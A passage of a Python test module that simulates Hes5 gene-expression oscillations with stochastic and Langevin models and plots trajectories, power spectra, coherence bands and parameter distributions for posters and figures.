plt.text(0.95, 0.95, 'Coherence:\n' + "{:.2f}".format(fourth_coherence) + ' '
"{:.2f}".format(fourth_langevin_coherence) + ' ' +
"{:.2f}".format(fourth_theoretical_coherence) +
'\nPeriod:\n' + "{:.2f}".format(fourth_period) + ' '
"{:.2f}".format(fourth_langevin_period) + ' ' +
"{:.2f}".format(fourth_theoretical_period),
fontsize = 5,
verticalalignment='top', horizontalalignment='right',
transform=plt.gca().transAxes)
##
# fifth example
##
# generate the random samples:
fifth_parameter = np.array([11.0,29.0,31400.0,29.0])
# fifth_parameter = my_posterior_samples[2]
fifth_mRNA_trajectories, fifth_protein_trajectories = hes5.generate_multiple_trajectories( number_of_trajectories = number_of_traces,
duration = 1500*repetition_factor,
repression_threshold = fifth_parameter[2],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = 0.03,
transcription_delay = fifth_parameter[3],
basal_transcription_rate = fifth_parameter[0],
translation_rate = fifth_parameter[1],
initial_mRNA = 10,
initial_protein = fifth_parameter[2],
equilibration_time = 1000,
synchronize = False )
fifth_langevin_mRNA_trajectories, fifth_langevin_protein_trajectories = hes5.generate_multiple_langevin_trajectories( number_of_trajectories = number_of_traces,
duration = 1500*repetition_factor,
repression_threshold = fifth_parameter[2],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = 0.03,
transcription_delay = fifth_parameter[3],
basal_transcription_rate = fifth_parameter[0],
translation_rate = fifth_parameter[1],
initial_mRNA = 10,
initial_protein = fifth_parameter[2],
equilibration_time = 1000)
fifth_theoretical_power_spectrum = hes5.calculate_theoretical_power_spectrum_at_parameter_point(
repression_threshold = fifth_parameter[2],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = 0.03,
transcription_delay = fifth_parameter[3],
basal_transcription_rate = fifth_parameter[0],
translation_rate = fifth_parameter[1]
)
fifth_theoretical_coherence, fifth_theoretical_period = hes5.calculate_coherence_and_period_of_power_spectrum(fifth_theoretical_power_spectrum)
fifth_power_spectrum, fifth_coherence, fifth_period = hes5.calculate_power_spectrum_of_trajectories(fifth_protein_trajectories)
fifth_langevin_power_spectrum, fifth_langevin_coherence, fifth_langevin_period = hes5.calculate_power_spectrum_of_trajectories(fifth_langevin_protein_trajectories)
my_figure.add_subplot(529)
mrna_example, = plt.plot( fifth_mRNA_trajectories[:,0],
fifth_mRNA_trajectories[:,1]*0.1, label = 'mRNA example*1000', color = 'black',
lw = 0.5 )
protein_example, = plt.plot( fifth_protein_trajectories[:,0],
fifth_protein_trajectories[:,1]/10000, label = 'Protein example', color = 'black', ls = '--',
lw = 0.5, dashes = [1,1] )
plt.plot( fifth_langevin_mRNA_trajectories[:,0],
fifth_langevin_mRNA_trajectories[:,1]*0.1, label = 'mRNA example*1000', color = 'green',
lw = 0.5 )
plt.plot( fifth_langevin_protein_trajectories[:,0],
fifth_langevin_protein_trajectories[:,1]/10000, label = 'Protein example', color = 'green', ls = '--',
lw = 0.5, dashes = [1,1] )
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.xlabel('Time [min]')
plt.ylabel('Copy number [1e4]')
plt.xlim(0,1500)
plt.ylim(0,15)
plt.text(0.1, 0.01, r'$\alpha_m =$ ' + '{:.2f}'.format(fifth_parameter[0]) +
r', $\alpha_p =$ ' + '{:.2f}'.format(fifth_parameter[1]) +
r', $\mu_p =$ ' + '{:.2f}'.format(0.03) +
'\n' + r'$p_0 = $ ' + '{:.2f}'.format(fifth_parameter[2]) +
r', $\tau = $ ' + '{:.2f}'.format(fifth_parameter[3]),
fontsize = 5,
transform=plt.gca().transAxes)
# plt.legend()
my_figure.add_subplot(5,2,10)
for trajectory in fifth_protein_trajectories[:,1:].transpose():
compound_trajectory = np.vstack((fifth_protein_trajectories[:,0],trajectory)).transpose()
this_power_spectrum,_,_ = hes5.calculate_power_spectrum_of_trajectory(compound_trajectory)
plt.plot(this_power_spectrum[:,0],this_power_spectrum[:,1], color = 'black', alpha = 0.01)
plt.plot(fifth_power_spectrum[:,0],
fifth_power_spectrum[:,1], color = 'black')
plt.plot(fifth_langevin_power_spectrum[:,0],
fifth_langevin_power_spectrum[:,1], color = 'green')
plt.plot(fifth_theoretical_power_spectrum[:,0],
fifth_theoretical_power_spectrum[:,1], color = 'blue')
plt.xlim(0,0.01)
# plt.ylim(0,100)
plt.xlabel('Frequency')
plt.ylabel('Occurence')
plt.gca().locator_params(axis='x', tight = True, nbins=4)
# import pdb; pdb.set_trace()
plt.text(0.05, 0.95, 'Coherence:\n' + "{:.2f}".format(fifth_coherence) + ' '
"{:.2f}".format(fifth_langevin_coherence) + ' ' +
"{:.2f}".format(fifth_theoretical_coherence) +
'\nPeriod:\n' + "{:.2f}".format(fifth_period) + ' '
"{:.2f}".format(fifth_langevin_period) + ' ' +
"{:.2f}".format(fifth_theoretical_period),
fontsize = 5,
verticalalignment='top', horizontalalignment='left',
transform=plt.gca().transAxes)
plt.tight_layout()
my_figure.legend((mrna_example, protein_example),
('mRNA*1000', 'Protein'),
loc = 'upper left', ncol = 2, fontsize = 10 )
plt.figtext(0.5, 0.975, 'Langevin', horizontalalignment='left', color = 'green')
plt.figtext(0.65, 0.975, 'Gillespie', horizontalalignment='left', color = 'black')
plt.figtext(0.8, 0.975, 'LNA', horizontalalignment='left', color = 'blue')
plt.gca().locator_params(axis='x', tight = True, nbins=4)
# plt.subplots_adjust(top = 0.9, hspace = 0.7)
plt.subplots_adjust(top = 0.95)
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','logarithmic_low_transcription_rate_langevin_validation.pdf'))
def test_visualise_model_regimes(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data','sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
number_of_traces = 10
figuresize = (6,2.5)
my_figure = plt.figure(figsize = figuresize)
outer_grid = matplotlib.gridspec.GridSpec(1, 3 )
coherence_bands = [[0,0.1],
[0.2,0.3],
[0.5,0.6]]
panel_labels = {0: 'A', 1: 'B', 2: 'C'}
for coherence_index, coherence_band in enumerate(coherence_bands):
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05,
np.logical_and(model_results[:,3]>coherence_band[0],
model_results[:,3]<coherence_band[1]))))))
my_posterior_results = model_results[accepted_indices]
my_posterior_samples = prior_samples[accepted_indices]
this_double_grid = matplotlib.gridspec.GridSpecFromSubplotSpec(2, 1,
subplot_spec = outer_grid[coherence_index],
height_ratios= [number_of_traces, 1])
# wspace = 5.0)
this_inner_grid = matplotlib.gridspec.GridSpecFromSubplotSpec(number_of_traces, 1,
subplot_spec=this_double_grid[0], hspace=0.0)
this_parameter = my_posterior_samples[0]
this_results = my_posterior_results[0]
for subplot_index in range(number_of_traces):
this_axis = plt.Subplot(my_figure, this_inner_grid[subplot_index])
my_figure.add_subplot(this_axis)
this_trace = hes5.generate_langevin_trajectory(
duration = 1500,
repression_threshold = this_parameter[2],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = np.log(2)/90,
transcription_delay = this_parameter[3],
basal_transcription_rate = this_parameter[0],
translation_rate = this_parameter[1],
initial_mRNA = 10,
hill_coefficient = this_parameter[4],
initial_protein = this_parameter[2],
equilibration_time = 1000)
plt.plot(this_trace[:,0], this_trace[:,2]/1e4)
plt.ylim(3,9)
# this_axis.locator_params(axis='y', tight = True, nbins=1)
# this_axis.locator_params(axis='y', nbins=2)
this_axis.locator_params(axis='x', tight = True, nbins=3)
plt.yticks([])
this_axis.tick_params(axis='both', length = 1)
if subplot_index == 0:
plt.title('Coherence: ' + '{:.2f}'.format(this_results[3]) +
r', $\alpha_m =$ ' + '{:.2f}'.format(this_parameter[0]) +
r', $n =$ ' + '{:.2f}'.format(this_parameter[4]) +
'\n' + r'$\alpha_p =$ ' + '{:.2f}'.format(this_parameter[1]) +
r', $p_0 = $ ' + '{:.2f}'.format(this_parameter[2]) +
r', $\tau = $ ' + '{:.2f}'.format(this_parameter[3]),
fontsize = 5)
plt.gca().text(-0.2, 2.1, panel_labels[coherence_index], transform=plt.gca().transAxes)
if subplot_index < number_of_traces - 1:
this_axis.xaxis.set_ticklabels([])
if subplot_index !=9 or coherence_index != 0:
this_axis.yaxis.set_ticklabels([])
else:
plt.yticks([3,9])
if coherence_index == 0 and subplot_index == 4:
plt.ylabel('Expression/1e4 ', labelpad = 15)
plt.xlabel('Time [min]', labelpad = 2)
plt.yticks([3,9])
this_axis = plt.Subplot(my_figure, this_double_grid[1])
my_figure.add_subplot(this_axis)
plt.xlabel('Frequency [1/min]', labelpad = 2)
_, these_traces = hes5.generate_multiple_langevin_trajectories(number_of_trajectories = 200,
duration = 1500*5,
repression_threshold = this_parameter[2],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = np.log(2)/90,
transcription_delay = this_parameter[3],
basal_transcription_rate = this_parameter[0],
translation_rate = this_parameter[1],
initial_mRNA = 10,
initial_protein = this_parameter[2],
hill_coefficient = this_parameter[4],
equilibration_time = 1000)
this_power_spectrum, _, _ = hes5.calculate_power_spectrum_of_trajectories(these_traces)
smoothened_power_spectrum = hes5.smoothen_power_spectrum(this_power_spectrum)
plt.plot(this_power_spectrum[:,0], this_power_spectrum[:,1])
this_axis.locator_params(axis='x', tight = True, nbins=3)
this_axis.tick_params(axis='both', length = 1)
if coherence_index == 0:
plt.ylabel('Power', labelpad = 15)
max_index = np.argmax(smoothened_power_spectrum[:,1])
max_power_frequency = smoothened_power_spectrum[max_index,0]
left_frequency = max_power_frequency*0.9
right_frequency = max_power_frequency*1.1
plt.axvline(left_frequency, color = 'black')
plt.axvline(right_frequency, color = 'black')
plt.xlim(0.0,0.01)
plt.yticks([])
plt.axhline(3)
plt.tight_layout()
my_figure.subplots_adjust(hspace = 0.7)
my_figure.savefig(os.path.join(os.path.dirname(__file__),'output','model_visualisation.pdf'))
def xest_visualise_different_coherences(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data','sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
figure_coherence_bands = np.array([[[0.0,0.1],
[0.1,0.2],
[0.2,0.3]],
[[0.3,0.4],
[0.5,0.6],
[0.6,0.7]]])
number_of_traces = 10
for figure_index in range(2):
figuresize = (6,9)
my_figure = plt.figure(figsize = figuresize)
outer_grid = matplotlib.gridspec.GridSpec(3, 3 )
coherence_bands = figure_coherence_bands[figure_index]
# [0.2,0.3],
# [0.3,0.4]]
for coherence_index, coherence_band in enumerate(coherence_bands):
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05,
np.logical_and(model_results[:,3]>coherence_band[0],
model_results[:,3]<coherence_band[1]))))))
my_posterior_results = model_results[accepted_indices]
my_posterior_samples = prior_samples[accepted_indices]
for parameter_index in range(3):
this_double_grid = matplotlib.gridspec.GridSpecFromSubplotSpec(2, 1,
subplot_spec = outer_grid[coherence_index*3 + parameter_index],
height_ratios= [number_of_traces, 1])
this_inner_grid = matplotlib.gridspec.GridSpecFromSubplotSpec(number_of_traces, 1,
subplot_spec=this_double_grid[0], hspace=0.0)
try:
this_parameter = my_posterior_samples[parameter_index]
this_results = my_posterior_results[parameter_index]
except IndexError:
this_parameter = my_posterior_samples[0]
this_results = my_posterior_results[0]
for subplot_index in range(number_of_traces):
this_axis = plt.Subplot(my_figure, this_inner_grid[subplot_index])
my_figure.add_subplot(this_axis)
this_trace = hes5.generate_langevin_trajectory(
duration = 1500,
repression_threshold = this_parameter[2],
hill_coefficient = this_parameter[4],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = np.log(2)/90,
transcription_delay = this_parameter[3],
basal_transcription_rate = this_parameter[0],
translation_rate = this_parameter[1],
initial_mRNA = 10,
initial_protein = this_parameter[2],
equilibration_time = 1000)
plt.plot(this_trace[:,0], this_trace[:,2]/1e4)
plt.ylim(4,8)
# this_axis.locator_params(axis='y', tight = True, nbins=1)
# this_axis.locator_params(axis='y', nbins=2)
this_axis.locator_params(axis='x', tight = True, nbins=3)
plt.yticks([])
this_axis.tick_params(axis='both', length = 1)
if subplot_index == 0:
plt.title('Coherence: ' + '{:.2f}'.format(this_results[3]) +
r', $\alpha_m =$ ' + '{:.2f}'.format(this_parameter[0]) +
r', $n =$ ' + '{:.2f}'.format(this_parameter[4]) +
'\n' + r'$\alpha_p =$ ' + '{:.2f}'.format(this_parameter[1]) +
r', $p_0 = $ ' + '{:.2f}'.format(this_parameter[2]) +
r', $\tau = $ ' + '{:.2f}'.format(this_parameter[3]),
fontsize = 5)
if subplot_index < number_of_traces - 1:
this_axis.xaxis.set_ticklabels([])
if parameter_index !=0:
this_axis.yaxis.set_ticklabels([])
if parameter_index == 0 and subplot_index == 5:
plt.ylabel('Expression/1e4', labelpad = 15)
plt.xlabel('Time [min]', labelpad = 2)
plt.yticks([4,8])
this_axis = plt.Subplot(my_figure, this_double_grid[1])
my_figure.add_subplot(this_axis)
plt.xlabel('Frequency [1/min]', labelpad = 2)
_, these_traces = hes5.generate_multiple_langevin_trajectories(number_of_trajectories = 200,
duration = 1500*5,
repression_threshold = this_parameter[2],
hill_coefficient = this_parameter[4],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = np.log(2)/90,
transcription_delay = this_parameter[3],
basal_transcription_rate = this_parameter[0],
translation_rate = this_parameter[1],
initial_mRNA = 10,
initial_protein = this_parameter[2],
equilibration_time = 1000)
this_power_spectrum, _, _ = hes5.calculate_power_spectrum_of_trajectories(these_traces)
smoothened_power_spectrum = hes5.smoothen_power_spectrum(this_power_spectrum)
plt.plot(this_power_spectrum[:,0], this_power_spectrum[:,1])
plt.plot(smoothened_power_spectrum[:,0], smoothened_power_spectrum[:,1],
color = 'grey' )
this_axis.locator_params(axis='x', tight = True, nbins=3)
this_axis.tick_params(axis='both', length = 1)
if parameter_index == 0:
plt.ylabel('Power', labelpad = 15)
max_index = np.argmax(smoothened_power_spectrum[:,1])
max_power_frequency = smoothened_power_spectrum[max_index,0]
left_frequency = max_power_frequency*0.9
right_frequency = max_power_frequency*1.1
plt.axvline(left_frequency, color = 'black')
plt.axvline(right_frequency, color = 'black')
plt.xlim(0.0,0.01)
plt.yticks([])
plt.axhline(3)
plt.figtext(0.5,0.98,r'Coherence $\in$ '
+ np.array_str(coherence_bands[0,:], precision=1), fontsize = 10,
rotation = 'horizontal', verticalalignment = 'bottom', multialignment = 'center',
horizontalalignment = 'center')
plt.figtext(0.5,0.65,r'Coherence $\in$ '
+ np.array_str(coherence_bands[1,:], precision=1), fontsize = 10,
rotation = 'horizontal', verticalalignment = 'bottom', multialignment = 'center',
horizontalalignment = 'center')
plt.figtext(0.5,0.32,r'Coherence $\in$ '
+ np.array_str(coherence_bands[2,:], precision=1), fontsize = 10,
rotation = 'horizontal', verticalalignment = 'bottom', multialignment = 'center',
horizontalalignment = 'center')
plt.tight_layout()
my_figure.subplots_adjust(hspace = 0.5)
my_figure.savefig(os.path.join(os.path.dirname(__file__),'output','coherence_visualisation_' +
str(figure_index) + '.pdf'))
def xest_visualise_heterozygous_model(self):
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_hill')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05))))
my_posterior_samples = prior_samples[accepted_indices]
my_model_results = model_results[accepted_indices]
figuresize = (7,9)
my_figure = plt.figure(figsize = figuresize)
outer_grid = matplotlib.gridspec.GridSpec(2, 3 )
for parameter_index in range(6):
this_parameter_grid = matplotlib.gridspec.GridSpecFromSubplotSpec(2, 1,
subplot_spec = outer_grid[parameter_index], height_ratios=[3,1],
hspace=0.3)
this_parameter = my_posterior_samples[parameter_index]
this_model_results = my_model_results[parameter_index]
_, these_traces_1, _, these_traces_2 = hes5.generate_multiple_heterozygous_langevin_trajectories(
number_of_trajectories = 200,
duration = 1500*5,
repression_threshold = this_parameter[2],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = np.log(2)/90,
transcription_delay = this_parameter[3],
basal_transcription_rate = this_parameter[0],
translation_rate = this_parameter[1],
initial_mRNA = 10,
initial_protein = this_parameter[2],
hill_coefficient = this_parameter[4],
equilibration_time = 1000)
these_compound_traces = np.zeros_like(these_traces_1)
these_compound_traces[:,0] = these_traces_1[:,0]
these_compound_traces[:,1:] = these_traces_1[:,1:]+these_traces_2[:,1:]
this_compound_power_spectrum, _, _ = hes5.calculate_power_spectrum_of_trajectories(these_compound_traces)
this_allele_1_power_spectrum, _, _ = hes5.calculate_power_spectrum_of_trajectories(these_traces_1)
this_allele_2_power_spectrum, _, _ = hes5.calculate_power_spectrum_of_trajectories(these_traces_2)
this_upper_grid = matplotlib.gridspec.GridSpecFromSubplotSpec(3, 1,
subplot_spec = this_parameter_grid[0])
for realisation_index in range(3):
this_realisation_grid = matplotlib.gridspec.GridSpecFromSubplotSpec(3, 1,
subplot_spec = this_upper_grid[realisation_index], hspace = 0.0)
this_homozygous_axis = plt.Subplot(my_figure, this_realisation_grid[0])
my_figure.add_subplot(this_homozygous_axis)
this_homozygous_axis.plot(these_compound_traces[:,0],
these_compound_traces[:,realisation_index + 1]/10000,
color = 'black')
plt.xlim(0,1500)
plt.ylim(4.5,8.5)
this_homozygous_axis.locator_params(axis='x', tight = True, nbins=3)
this_homozygous_axis.locator_params(axis='y', tight = True, nbins=3)
plt.gca().xaxis.set_ticklabels([])
if realisation_index == 0:
plt.title('Coherence: ' + '{:.2f}'.format(this_model_results[3]) +
r', $\alpha_m =$ ' + '{:.2f}'.format(this_parameter[0]) +
r', $n =$ ' + '{:.2f}'.format(this_parameter[4]) +
'\n' + r'$\alpha_p =$ ' + '{:.2f}'.format(this_parameter[1]) +
r', $p_0 = $ ' + '{:.2f}'.format(this_parameter[2]) +
r', $\tau = $ ' + '{:.2f}'.format(this_parameter[3]),
fontsize = 7)
this_allele_axis_1 = plt.Subplot(my_figure, this_realisation_grid[1])
my_figure.add_subplot(this_allele_axis_1)
this_allele_axis_1.plot(these_traces_1[:,0],
these_traces_1[:,realisation_index + 1]/10000,
color = 'green')
plt.ylim(1.5,5.5)
plt.xlim(0,1500)
this_allele_axis_1.locator_params(axis='x', tight = True, nbins=3)
this_allele_axis_1.locator_params(axis='y', tight = True, nbins=3)
plt.gca().xaxis.set_ticklabels([])
if parameter_index in [0,3] and realisation_index == 1:
plt.ylabel("Expression/1e4")
this_allele_axis_2 = plt.Subplot(my_figure, this_realisation_grid[2])
my_figure.add_subplot(this_allele_axis_2)
this_allele_axis_2.plot(these_traces_2[:,0],
these_traces_2[:,realisation_index + 1]/10000,
color = 'blue')
plt.ylim(1.5,5.5)
plt.xlim(0,1500)
this_allele_axis_2.locator_params(axis='x', tight = True, nbins=3)
this_allele_axis_2.locator_params(axis='y', tight = True, nbins=3)
if realisation_index != 2:
plt.gca().xaxis.set_ticklabels([])
else:
plt.xlabel("Time [min]")
this_power_spectrum_grid = matplotlib.gridspec.GridSpecFromSubplotSpec(3, 1,
subplot_spec = this_parameter_grid[1], hspace = 0.0)
homozygous_power_spectrum_axis = plt.Subplot(my_figure,this_power_spectrum_grid[0])
my_figure.add_subplot(homozygous_power_spectrum_axis)
homozygous_power_spectrum_axis.plot(this_compound_power_spectrum[:,0],
this_compound_power_spectrum[:,1],
color = 'black')
plt.xlim(0,0.01)
homozygous_power_spectrum_axis.locator_params(axis='x', tight = True, nbins=3)
homozygous_power_spectrum_axis.locator_params(axis='y', tight = True, nbins=3)
plt.gca().xaxis.set_ticklabels([])
plt.gca().yaxis.set_ticklabels([])
if parameter_index == 0:
plt.text(0.03, 0.6, 'Homozygous',
fontsize = 7,
color = 'black',
transform=plt.gca().transAxes)
allele_1_power_spectrum_axis = plt.Subplot(my_figure, this_power_spectrum_grid[1])
my_figure.add_subplot(allele_1_power_spectrum_axis)
allele_1_power_spectrum_axis.plot(this_allele_1_power_spectrum[:,0],
this_allele_1_power_spectrum[:,1],
color = 'green')
plt.xlim(0,0.01)
allele_1_power_spectrum_axis.locator_params(axis='x', tight = True, nbins=3)
allele_1_power_spectrum_axis.locator_params(axis='y', tight = True, nbins=3)
plt.gca().xaxis.set_ticklabels([])
plt.gca().yaxis.set_ticklabels([])
if parameter_index in [0, 3]:
plt.ylabel("Power")
if parameter_index == 0:
plt.text(0.03, 0.6, 'Allele 1',
fontsize = 7,
color = 'green',
transform=plt.gca().transAxes)
allele_2_power_spectrum_axis = plt.Subplot(my_figure, this_power_spectrum_grid[2])
my_figure.add_subplot(allele_2_power_spectrum_axis)
allele_2_power_spectrum_axis.plot(this_allele_2_power_spectrum[:,0],
this_allele_2_power_spectrum[:,1],
color = 'blue')
plt.xlim(0,0.01)
allele_2_power_spectrum_axis.locator_params(axis='x', tight = True, nbins=3)
allele_2_power_spectrum_axis.locator_params(axis='y', tight = True, nbins=3)
plt.gca().yaxis.set_ticklabels([])
plt.xlabel("Frequency [1/min]")
if parameter_index == 0:
plt.text(0.03, 0.6, 'Allele 2',
fontsize = 7,
color = 'blue',
transform=plt.gca().transAxes)
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),'output','heterozygous_visualisation.pdf'))
def xest_plot_ngn(self):
excel_path = os.path.join(os.path.dirname(__file__),'data','Ngn2Staining_VS_VH5intensity_E10_5.xlsx')
complete_excel_file = xlrd.open_workbook(excel_path)
excel_sheet = complete_excel_file.sheet_by_index(3)
hes5_column_values = excel_sheet.col_values(8)
ngn2_column_values = excel_sheet.col_values(9)
hes5_values = hes5_column_values[4:]
ngn2_values = ngn2_column_values[4:]
sns.set()
font = {'size' : 28}
plt.rc('font', **font)
plt.figure( figsize = (5,3) )
# plt.scatter(hes5_values, ngn2_values, color = 'grey', lw = 0)
# plt.scatter(hes5_values, ngn2_values, color = 'grey', lw = 0)
sns.regplot(x=np.array(hes5_values), y=np.array(ngn2_values), fit_reg=False)
plt.xlabel('Hes5 (a. u.)')
plt.ylabel('Ngn2 (a. u.)')
plt.xlim(0,)
plt.ylim(0,)
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),'output','ngn_visualisation.pdf'))
def xest_plot_distributions_for_poster(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# prior_samples[:,3]>20))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
my_posterior_samples[:,2]/=10000
data_frame = pd.DataFrame( data = my_posterior_samples,
columns= ['Transcription rate',
'Translation rate',
'Repression threshold/1e4',
'Transcription delay',
'Hill coefficient'])
sns.set(font_scale = 1.3, rc = {'ytick.labelsize': 6})
font = {'size' : 28}
plt.rc('font', **font)
my_figure = plt.figure(figsize= (11,3))
my_figure.add_subplot(151)
# transcription_rate_bins = np.logspace(-1,2,20)
transcription_rate_bins = np.linspace(-1,2,20)
# transcription_rate_histogram,_ = np.histogram( data_frame['Transcription delay'],
# bins = time_delay_bins )
sns.distplot(np.log10(data_frame['Transcription rate']),
kde = False,
rug = False,
norm_hist = True,
bins = transcription_rate_bins)
# plt.gca().set_xscale("log")
# plt.gca().set_xlim(0.1,100)
plt.gca().set_xlim(-1,2)
plt.ylabel("Probability", labelpad = 20)
plt.xlabel("Transcription rate \n [1/min]")
plt.gca().locator_params(axis='y', tight = True, nbins=2, labelsize = 'small')
plt.gca().set_ylim(0,0.8)
plt.xticks([-1,0,1,2], [r'$10^{-1}$',r'$10^0$',r'$10^1$',r'$10^2$'])
# plt.yticks([])
my_figure.add_subplot(152)
# translation_rate_bins = np.logspace(0,2.3,20)
translation_rate_bins = np.linspace(0,2.3,20)
sns.distplot(np.log10(data_frame['Translation rate']),
kde = False,
rug = False,
norm_hist = True,
bins = translation_rate_bins)
# plt.gca().set_xscale("log")
# plt.gca().set_xlim(1,200)
plt.gca().set_xlim(0,2.3)
plt.gca().set_ylim(0,1.3)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
plt.xticks([0,1,2], [r'$10^0$',r'$10^1$',r'$10^2$'])
plt.xlabel("Translation rate \n [1/min]")
# plt.yticks([])
my_figure.add_subplot(153)
sns.distplot(data_frame['Repression threshold/1e4'],
kde = False,
norm_hist = True,
rug = False)
# plt.gca().set_xlim(1,200)
plt.xlabel("Repression threshold \n [1e4]")
plt.gca().set_ylim(0,0.22)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
# plt.yticks([])
plots_to_shift = []
plots_to_shift.append(my_figure.add_subplot(154))
time_delay_bins = np.linspace(5,40,10)
sns.distplot(data_frame['Transcription delay'],
kde = False,
rug = False,
norm_hist = True,
bins = time_delay_bins)
plt.gca().set_xlim(0,45)
plt.gca().set_ylim(0,0.035)
plt.gca().locator_params(axis='x', tight = True, nbins=5)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
plt.xlabel("Transcription delay \n [min]")
# plt.yticks([])
plots_to_shift.append(my_figure.add_subplot(155))
sns.distplot(data_frame['Hill coefficient'],
kde = False,
norm_hist = True,
rug = False)
# plt.gca().set_xlim(1,200)
plt.gca().set_ylim(0,0.35)
plt.gca().set_xlim(1,7)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
# plt.yticks([])
plt.tight_layout(w_pad = 0.0001)
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','inference_for_poster.pdf'))
def test_plot_prior_for_poster(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# prior_samples[:,3]>20))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
my_posterior_samples[:,2]/=10000
prior_samples[:,2]/=10000
data_frame = pd.DataFrame( data = prior_samples,
columns= ['Transcription rate',
'Translation rate',
'Repression threshold/1e4',
'Transcription delay',
'Hill coefficient'])
sns.set(font_scale = 1.3, rc = {'ytick.labelsize': 6})
font = {'size' : 28}
plt.rc('font', **font)
my_figure = plt.figure(figsize= (11,3))
my_figure.add_subplot(151)
# transcription_rate_bins = np.logspace(-1,2,20)
transcription_rate_bins = np.linspace(-1,2,20)
# transcription_rate_histogram,_ = np.histogram( data_frame['Transcription delay'],
# bins = time_delay_bins )
sns.distplot(np.log10(data_frame['Transcription rate']),
kde = False,
rug = False,
norm_hist = True,
bins = transcription_rate_bins)
# plt.gca().set_xscale("log")
# plt.gca().set_xlim(0.1,100)
plt.gca().set_xlim(-1,2)
plt.ylabel("Probability", labelpad = 20)
plt.xlabel("Transcription rate \n [1/min]")
plt.gca().locator_params(axis='y', tight = True, nbins=2, labelsize = 'small')
plt.gca().set_ylim(0,0.8)
plt.xticks([-1,0,1,2], [r'$10^{-1}$',r'$10^0$',r'$10^1$',r'$10^2$'])
# plt.yticks([])
my_figure.add_subplot(152)
# translation_rate_bins = np.logspace(0,2.3,20)
translation_rate_bins = np.linspace(0,2.3,20)
sns.distplot(np.log10(data_frame['Translation rate']),
kde = False,
rug = False,
norm_hist = True,
bins = translation_rate_bins)
# plt.gca().set_xscale("log")
# plt.gca().set_xlim(1,200)
plt.gca().set_xlim(0,2.3)
plt.gca().set_ylim(0,1.3)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
plt.xticks([0,1,2], [r'$10^0$',r'$10^1$',r'$10^2$'])
plt.xlabel("Translation rate \n [1/min]")
# plt.yticks([])
my_figure.add_subplot(153)
sns.distplot(data_frame['Repression threshold/1e4'],
kde = False,
norm_hist = True,
rug = False)
# plt.gca().set_xlim(1,200)
plt.xlabel("Repression threshold \n [1e4]")
plt.gca().set_ylim(0,0.22)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
# plt.yticks([])
plots_to_shift = []
plots_to_shift.append(my_figure.add_subplot(154))
time_delay_bins = np.linspace(5,40,10)
sns.distplot(data_frame['Transcription delay'],
kde = False,
rug = False,
norm_hist = True,
bins = time_delay_bins)
plt.gca().set_xlim(0,45)
plt.gca().set_ylim(0,0.035)
plt.gca().locator_params(axis='x', tight = True, nbins=5)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
plt.xlabel("Transcription delay \n [min]")
# plt.yticks([])
plots_to_shift.append(my_figure.add_subplot(155))
sns.distplot(data_frame['Hill coefficient'],
kde = False,
norm_hist = True,
rug = False)
# plt.gca().set_xlim(1,200)
plt.gca().set_ylim(0,0.35)
plt.gca().set_xlim(1,7)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
# plt.yticks([])
plt.tight_layout(w_pad = 0.0001)
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','prior_for_poster.pdf'))
def xest_make_agnostic_abc_samples(self):
## generate posterior samples
total_number_of_samples = 200000
